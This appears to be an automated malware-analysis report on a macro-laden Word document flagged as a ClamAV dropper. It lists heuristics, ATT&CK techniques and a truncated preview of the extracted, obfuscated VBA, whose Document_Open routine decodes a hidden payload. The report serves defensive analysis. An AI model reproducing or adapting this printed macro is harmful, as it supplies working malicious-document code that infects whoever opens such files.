MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a Microsoft Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The ClamAV detection name 'Doc.Dropper.Agent-6402733-0' strongly suggests its function as a dropper. The VBA macro code, though partially obfuscated, appears to be responsible for downloading and executing a secondary payload, as indicated by the heuristic firings and the nature of dropper malware.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6402733-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6402733-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12318 bytes |
SHA-256: 228f84d58a3101f979e8e14a09c57aa074807105b6612049d1e8bdf2e2a753b8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function catalectic(spinuliferous) As String Dim conjunctive(63) As Long Dim galvanic(6962) As Byte Dim entrain As Long Dim bactericide As Long Dim reproductive As String Dim fattism As Long Dim awol As Long Dim collision(63) As Long Dim ebenezer(63) As Long Dim fauteuil As Integer apocrine = Math.Round(53) Dim adverbs() As Byte geophysical = 72 - 21 + 257997 middlebrow = 35 - 114 + 334 Dim unforgivingly As Long cojugation = 74 - 125 + 262195 redhanded = 122 - 50 + 3960 luculent = 61 - 81 + 276 malaise = 122 - 26 + 65184 Dim aeronautical As String Dim aspects As Byte metrongr = 118 - 19 + 3997 trill = 94 - 117 + 87 bagpipes = 68 - 53 + 16711665 monoplane = 87 - 99 + 75 bloodied = 44 - 31 + 16515059 cave = 6 - 95 + 65625 Dim rely As String beautification = 27 - 38 + 7854 Dim arteriovenous() As Byte arteriovenous = VBA.StrConv(spinuliferous, 120 + 8) chlamydomonas = 56 + 5 Pmt 0, chlamydomonas, 28261, 20939, 3 sniff = 7843 elaborately = vbKeyShift - 12 For dib = 0 To sniff If dib Mod 2 = 0 Then arteriovenous(dib) = arteriovenous(dib) - elaborately Else arteriovenous(dib) = arteriovenous(dib) - (elaborately - 1) End If Next dib larrikin = 25 + 35 Pmt 0, larrikin, 4684, 35195, 3 fauteuil = 0 clew = salaam For awol = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) conjunctive(awol) = powderpuff(awol, trill, 70) ebenezer(awol) = powderpuff(awol, metrongr, 70) collision(awol) = powderpuff(awol, cojugation, 70) Next awol palpitation = 16 + 45 Pmt 0, palpitation, 32992, 24036, 4 adverbs = arteriovenous studiousness = 100 - 85 - 11 hurst = 11 + 30 Pmt 0, hurst, 14383, 22863, 3 crying = 121 - 121 + 3 peltandra = "salvation" peltandra = peltandra antheridiophore = crying + 1 dashingly = 116 - 71 - 43 For bactericide = 0 To sniff administer = adverbs(bactericide) filariidae = adverbs(bactericide + 2) translate = ebenezer(clew(adverbs(bactericide + 1))) spicebush = conjunctive(clew(filariidae)) + clew(adverbs(bactericide + crying)) entrain = collision(clew(administer)) + translate + spicebush awol = powderpuff(entrain, bagpipes, 62) galvanic(fattism) = powderpuff(awol, cave, 52) awol = powderpuff(entrain, malaise, 62) galvanic(fattism + 1) = powderpuff(awol, luculent, 52) galvanic(fattism + dashingly) = powderpuff(entrain, middlebrow, 62) fattism = fattism + dashingly + 1 bactericide = bactericide + 3 Next catalectic = galvanic End Function Private Sub Document_Open() Dim broussonetia As Variant Dim commodore As Long logometer = newsworthy loricata suite = 21 + 59 Pmt 0, suite, 18768, 50729, 4 End Sub Function loricata() Dim chiropractic As Long Dim lepisosteus As Variant judaic.illstarred.Value = Day(#12/5/2013#) varday = cashbox = "precedented" oxbridge = "catholic" populousness = "marte" tracing = cajanus archery = "barterer" fistulous = "emancipator" buddy = "minnows" Set bottomless = judaic.illstarred.SelectedItem fanatical = 39 + 7 Pmt 0, fanatical, 16054, 10254, 3 intraspecies = bottomless.Name undress = 7 - 117 + 7954 leguminosae = Right(intraspecies, undress) attroupement = catalectic(leguminosae) courts = 47 + 56 Pmt 0, courts, 16440, 53729, 4 thecodont = "graphotype" #If (61 - 72 + 411 + 57 - 4 + 247) > ((36 - 85 + 369) - (54 - 91 + 577) * 1) And ((35 - 16 + 9) - (62 - 41 + 7)) * 2 < (Win64) Then Dim muniment As Variant Dim georgia As LongPtr Dim exequies As LongPtr Dim ramekin As Long #ElseIf (65 - 88 + 423 + 111 - 87 + 276) > ((55 - 111 + 376) - (4 - 54 + 590) * 1) And Not ((31 - 104 + 101) - (24 - 40 + 44)) * 2 < (Win64) Then Dim calvados As String Dim exequies As Long Dim giddyhead As Byte Dim georgia As Long #End If adulterating = 78 - 80 + 2 levies = tamarind cardiomegaly = guadagna cartel ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.